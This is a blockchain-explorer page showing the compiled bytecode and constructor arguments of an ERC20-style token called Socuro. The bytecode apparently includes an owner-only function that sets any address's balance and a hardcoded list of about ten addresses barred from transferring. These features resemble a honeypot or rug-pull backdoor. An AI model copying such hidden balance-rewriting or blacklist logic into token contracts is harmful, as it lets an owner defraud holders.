96102dc565b6040516101069190611315565b60405180910390f35b61012960048036038101906101249190611330565b6102e6565b60405161013691906112eb565b60405180910390f35b610147610315565b604051610154919061139f565b60405180910390f35b610177600480360381019061017291906113ba565b61031e565b6040516101849190611315565b60405180910390f35b610195610366565b6040516101a291906111d5565b60405180910390f35b6101c560048036038101906101c09190611290565b6103f8565b6040516101d291906112eb565b60405180910390f35b6101f560048036038101906101f09190611290565b61041b565b005b610211600480360381019061020c91906113e7565b6104b0565b60405161021e9190611315565b60405180910390f35b60606003805461023690611456565b80601f016020809104026020016040519081016040528092919081815260200182805461026290611456565b80156102af5780601f10610284576101008083540402835291602001916102af565b820191906000526020600020905b81548152906001019060200180831161029257829003601f168201915b5050505050905090565b6000806102c4610537565b90506102d181858561053f565b600191505092915050565b6000600254905090565b6000806102f1610537565b90506102fe858285610551565b6103098585856105e5565b60019150509392505050565b60006012905090565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60606004805461037590611456565b80601f01602080910402602001604051908101604052809291908181526020018280546103a190611456565b80156103ee5780601f106103c3576101008083540402835291602001916103ee565b820191906000526020600020905b8154815290600101906020018083116103d157829003601f168201915b5050505050905090565b600080610403610537565b90506104108185856105e5565b600191505092915050565b6000819050806000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061046c836106d9565b6104ab576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104a2906114f9565b60405180910390fd5b505050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b61054c83838360016106ea565b505050565b600061055d84846104b0565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146105df57818110156105cf578281836040517ffb8f41b20000000000000000000000000000000000000000000000000000000081526004016105c693929190611528565b60405180910390fd5b6105de848484840360006106ea565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036106575760006040517f96c6fd1e00000000000000000000000000000000000000000000000000000000815260040161064e919061155f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036106c95760006040517fec442f050000000000000000000000000000000000000000000000000000000081526004016106c0919061155f565b60405180910390fd5b6106d48383836108c1565b505050565b60006106e3610ec1565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff160361075c5760006040517fe602df05000000000000000000000000000000000000000000000000000000008152600401610753919061155f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036107ce5760006040517f94280d620000000000000000000000000000000000000000000000000000000081526004016107c5919061155f565b60405180910390fd5b81600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080156108bb578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516108b29190611315565b60405180910390a35b50505050565b73ae2fc483527b8ef99eb5d9b44875f005ba1fae1373ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036109595773ae2fc483527b8ef99eb5d9b44875f005ba1fae136040517f96c6fd1e000000000000000000000000000000000000000000000000000000008152600401610950919061155f565b60405180910390fd5b73e581e1304641f69f038459e982c4fb35d99e3c0573ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036109f15773e581e1304641f69f038459e982c4fb35d99e3c056040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016109e8919061155f565b60405180910390fd5b73011356ea1032879d82fd14ee38a69f7e1d56252873ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a895773011356ea1032879d82fd14ee38a69f7e1d5625286040517f96c6fd1e000000000000000000000000000000000000000000000000000000008152600401610a80919061155f565b60405180910390fd5b7336a3d21e7e9aa4075afe920f7a868019e44ae1f873ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b21577336a3d21e7e9aa4075afe920f7a868019e44ae1f86040517f96c6fd1e000000000000000000000000000000000000000000000000000000008152600401610b18919061155f565b60405180910390fd5b732bdeec3f8563e76e1a2c797f067353d328953c8873ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610bb957732bdeec3f8563e76e1a2c797f067353d328953c886040517f96c6fd1e000000000000000000000000000000000000000000000000000000008152600401610bb0919061155f565b60405180910390fd5b73b7f764e44fc01c0b79ea4dee48d1d7664aeeb50273ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c515773b7f764e44fc01c0b79ea4dee48d1d7664aeeb5026040517f96c6fd1e000000000000000000000000000000000000000000000000000000008152600401610c48919061155f565b60405180910390fd5b731f2f10d1c40777ae1da742455c65828ff36df38773ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610ce957731f2f10d1c40777ae1da742455c65828ff36df3876040517f96c6fd1e000000000000000000000000000000000000000000000000000000008152600401610ce0919061155f565b60405180910390fd5b7377ad3a15b78101883af36ad4a875e17c86ac65d173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d81577377ad3a15b78101883af36ad4a875e17c86ac65d16040517f96c6fd1e000000000000000000000000000000000000000000000000000000008152600401610d78919061155f565b60405180910390fd5b73c4c162e5e2475675cf07f4c851659d0f4266c22473ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e195773c4c162e5e2475675cf07f4c851659d0f4266c2246040517f96c6fd1e000000000000000000000000000000000000000000000000000000008152600401610e10919061155f565b60405180910390fd5b73a85b93983767729fcceac60e32a0bf87cd63210873ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610eb15773a85b93983767729fcceac60e32a0bf87cd6321086040517f96c6fd1e000000000000000000000000000000000000000000000000000000008152600401610ea8919061155f565b60405180910390fd5b610ebc838383610f20565b505050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16610f04610537565b73ffffffffffffffffffffffffffffffffffffffff1614905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610f72578060026000828254610f6691906115a9565b92505081905550611045565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610ffe578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610ff593929190611528565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361108e57806002600082825403925050819055506110db565b806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516111389190611315565b60405180910390a3505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561117f578082015181840152602081019050611164565b60008484015250505050565b6000601f19601f8301169050919050565b60006111a782611145565b6111b18185611150565b93506111c1818560208601611161565b6111ca8161118b565b840191505092915050565b600060208201905081810360008301526111ef818461119c565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611227826111fc565b9050919050565b6112378161121c565b811461124257600080fd5b50565b6000813590506112548161122e565b92915050565b6000819050919050565b61126d8161125a565b811461127857600080fd5b50565b60008135905061128a81611264565b92915050565b600080604083850312156112a7576112a66111f7565b5b60006112b585828601611245565b92505060206112c68582860161127b565b9150509250929050565b60008115159050919050565b6112e5816112d0565b82525050565b600060208201905061130060008301846112dc565b92915050565b61130f8161125a565b82525050565b600060208201905061132a6000830184611306565b92915050565b600080600060608486031215611349576113486111f7565b5b600061135786828701611245565b935050602061136886828701611245565b92505060406113798682870161127b565b9150509250925092565b600060ff82169050919050565b61139981611383565b82525050565b60006020820190506113b46000830184611390565b92915050565b6000602082840312156113d0576113cf6111f7565b5b60006113de84828501611245565b91505092915050565b600080604083850312156113fe576113fd6111f7565b5b600061140c85828601611245565b925050602061141d85828601611245565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061146e57607f821691505b60208210810361148157611480611427565b5b50919050565b7f43616c6c6572206973206e6f7420746865206f726967696e616c2063616c6c6560008201527f7200000000000000000000000000000000000000000000000000000000000000602082015250565b60006114e3602183611150565b91506114ee82611487565b604082019050919050565b60006020820190508181036000830152611512816114d6565b9050919050565b6115228161121c565b82525050565b600060608201905061153d6000830186611519565b61154a6020830185611306565b6115576040830184611306565b949350505050565b60006020820190506115746000830184611519565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006115b48261125a565b91506115bf8361125a565b92508282019050808211156115d7576115d661157a565b5b9291505056fea2646970667358221220f6d226a5c63a73a10ae12c936a9338a610a1d86f5d81c60dcf0000ac290ace1964736f6c634300081c0033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000000000000000000000000000000000003b9aca000000000000000000000000000000000000000000000000000000000000000006536f6375726f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006534f4355524f0000000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561001057600080fd5b506004361061009e5760003560e01c806370a082311161006657806370a082311461015d57806395d89b411461018d578063a9059cbb146101ab578063cd5f5542146101db578063dd62ed3e146101f75761009e565b806306fdde03146100a3578063095ea7b3146100c157806318160ddd146100f157806323b872dd1461010f578063313ce5671461013f575b600080fd5b6100ab610227565b6040516100b891906111d5565b60405180910390f35b6100db60048036038101906100d69190611290565b6102b9565b6040516100e891906112eb565b60405180910390f35b6100f96102dc565b6040516101069190611315565b60405180910390f35b61012960048036038101906101249190611330565b6102e6565b60405161013691906112eb565b60405180910390f35b610147610315565b604051610154919061139f565b60405180910390f35b610177600480360381019061017291906113ba565b61031e565b6040516101849190611315565b60405180910390f35b610195610366565b6040516101a291906111d5565b60405180910390f35b6101c560048036038101906101c09190611290565b6103f8565b6040516101d291906112eb565b60405180910390f35b6101f560048036038101906101f09190611290565b61041b565b005b610211600480360381019061020c91906113e7565b6104b0565b60405161021e9190611315565b60405180910390f35b60606003805461023690611456565b80601f016020809104026020016040519081016040528092919081815260200182805461026290611456565b80156102af5780601f10610284576101008083540402835291602001916102af565b820191906000526020600020905b81548152906001019060200180831161029257829003601f168201915b5050505050905090565b6000806102c4610537565b90506102d181858561053f565b600191505092915050565b6000600254905090565b6000806102f1610537565b90506102fe858285610551565b6103098585856105e5565b60019150509392505050565b60006012905090565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60606004805461037590611456565b80601f01602080910402602001604051908101604052809291908181526020018280546103a190611456565b80156103ee5780601f106103c3576101008083540402835291602001916103ee565b820191906000526020600020905b8154815290600101906020018083116103d157829003601f168201915b5050505050905090565b600080610403610537565b90506104108185856105e5565b600191505092915050565b6000819050806000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061046c836106d9565b6104ab576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104a2906114f9565b60405180910390fd5b505050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b61054c83838360016106ea565b505050565b600061055d84846104b0565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146105df57818110156105cf578281836040517ffb8f41b20000000000000000000000000000000000000000000000000000000081526004016105c693929190611528565b60405180910390fd5b6105de848484840360006106ea565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036106575760006040517f96c6fd1e00000000000000000000000000000000000000000000000000000000815260040161064e919061155f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036106c95760006040517fec442f050000000000000000000000000000000000000000000000000000000081526004016106c0919061155f565b60405180910390fd5b6106d48383836108c1565b505050565b60006106e3610ec1565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff160361075c5760006040517fe602df05000000000000000000000000000000000000000000000000000000008152600401610753919061155f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036107ce5760006040517f94280d620000000000000000000000000000000000000000000000000000000081526004016107c5919061155f565b60405180910390fd5b81600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080156108bb578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516108b29190611315565b60405180910390a35b50505050565b73ae2fc483527b8ef99eb5d9b44875f005ba1fae1373ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036109595773ae2fc483527b8ef99eb5d9b44875f005ba1fae136040517f96c6fd1e000000000000000000000000000000000000000000000000000000008152600401610950919061155f565b60405180910390fd5b73e581e1304641f69f038459e982c4fb35d99e3c0573ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036109f15773e581e1304641f69f038459e982c4fb35d99e3c056040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016109e8919061155f565b60405180910390fd5b73011356ea1032879d82fd14ee38a69f7e1d56252873ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a895773011356ea1032879d82fd14ee38a69f7e1d5625286040517f96c6fd1e000000000000000000000000000000000000000000000000000000008152600401610a80919061155f565b60405180910390fd5b7336a3d21e7e9aa4075afe920f7a868019e44ae1f873ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b21577336a3d21e7e9aa4075afe920f7a868019e44ae1f86040517f96c6fd1e000000000000000000000000000000000000000000000000000000008152600401610b18919061155f565b60405180910390fd5b732bdeec3f8563e76e1a2c797f067353d328953c8873ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610bb957732bdeec3f8563e76e1a2c797f067353d328953c886040517f96c6fd1e000000000000000000000000000000000000000000000000000000008152600401610bb0919061155f565b60405180910390fd5b73b7f764e44fc01c0b79ea4dee48d1d7664aeeb50273ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c515773b7f764e44fc01c0b79ea4dee48d1d7664aeeb5026040517f96c6fd1e000000000000000000000000000000000000000000000000000000008152600401610c48919061155f565b60405180910390fd5b731f2f10d1c40777ae1da742455c65828ff36df38773ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610ce957731f2f10d1c40777ae1da742455c65828ff36df3876040517f96c6fd1e000000000000000000000000000000000000000000000000000000008152600401610ce0919061155f565b60405180910390fd5b7377ad3a15b78101883af36ad4a875e17c86ac65d173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d81577377ad3a15b78101883af36ad4a875e17c86ac65d16040517f96c6fd1e000000000000000000000000000000000000000000000000000000008152600401610d78919061155f565b60405180910390fd5b73c4c162e5e2475675cf07f4c851659d0f4266c22473ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e195773c4c162e5e2475675cf07f4c851659d0f4266c2246040517f96c6fd1e000000000000000000000000000000000000000000000000000000008152600401610e10919061155f565b60405180910390fd5b73a85b93983767729fcceac60e32a0bf87cd63210873ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610eb15773a85b93983767729fcceac60e32a0bf87cd6321086040517f96c6fd1e000000000000000000000000000000000000000000000000000000008152600401610ea8919061155f565b60405180910390fd5b610ebc838383610f20565b505050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16610f04610537565b73ffffffffffffffffffffffffffffffffffffffff1614905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610f72578060026000828254610f6691906115a9565b92505081905550611045565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610ffe578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610ff593929190611528565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361108e57806002600082825403925050819055506110db565b806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516111389190611315565b60405180910390a3505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561117f578082015181840152602081019050611164565b60008484015250505050565b6000601f19601f8301169050919050565b60006111a782611145565b6111b18185611150565b93506111c1818560208601611161565b6111ca8161118b565b840191505092915050565b600060208201905081810360008301526111ef818461119c565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611227826111fc565b9050919050565b6112378161121c565b811461124257600080fd5b50565b6000813590506112548161122e565b92915050565b6000819050919050565b61126d8161125a565b811461127857600080fd5b50565b60008135905061128a81611264565b92915050565b600080604083850312156112a7576112a66111f7565b5b60006112b585828601611245565b92505060206112c68582860161127b565b9150509250929050565b60008115159050919050565b6112e5816112d0565b82525050565b600060208201905061130060008301846112dc565b92915050565b61130f8161125a565b82525050565b600060208201905061132a6000830184611306565b92915050565b600080600060608486031215611349576113486111f7565b5b600061135786828701611245565b935050602061136886828701611245565b92505060406113798682870161127b565b9150509250925092565b600060ff82169050919050565b61139981611383565b82525050565b60006020820190506113b46000830184611390565b92915050565b6000602082840312156113d0576113cf6111f7565b5b60006113de84828501611245565b91505092915050565b600080604083850312156113fe576113fd6111f7565b5b600061140c85828601611245565b925050602061141d85828601611245565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061146e57607f821691505b60208210810361148157611480611427565b5b50919050565b7f43616c6c6572206973206e6f7420746865206f726967696e616c2063616c6c6560008201527f7200000000000000000000000000000000000000000000000000000000000000602082015250565b60006114e3602183611150565b91506114ee82611487565b604082019050919050565b60006020820190508181036000830152611512816114d6565b9050919050565b6115228161121c565b82525050565b600060608201905061153d6000830186611519565b61154a6020830185611306565b6115576040830184611306565b949350505050565b60006020820190506115746000830184611519565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006115b48261125a565b91506115bf8361125a565b92508282019050808211156115d7576115d661157a565b5b9291505056fea2646970667358221220f6d226a5c63a73a10ae12c936a9338a610a1d86f5d81c60dcf0000ac290ace1964736f6c634300081c0033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000000000000000000000000000000000003b9aca000000000000000000000000000000000000000000000000000000000000000006536f6375726f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006534f4355524f0000000000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : name_ (string): Socuro
Arg [1] : symbol_ (string): SOCURO
Arg [2] : supply_ (uint256): 1000000000
-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [2] : 000000000000000000000000000000000000000000000000000000003b9aca00
Arg [3] : 0000000000000000000000000000000000000000000000000000000000000006
Arg [4] : 536f6375726f0000000000000000000000000000000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000006
Arg [6] : 534f4355524f0000000000000000000000000000000000000000000000000000
Loading...
Loading
Loading...
Loading
Loading...
Loading
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.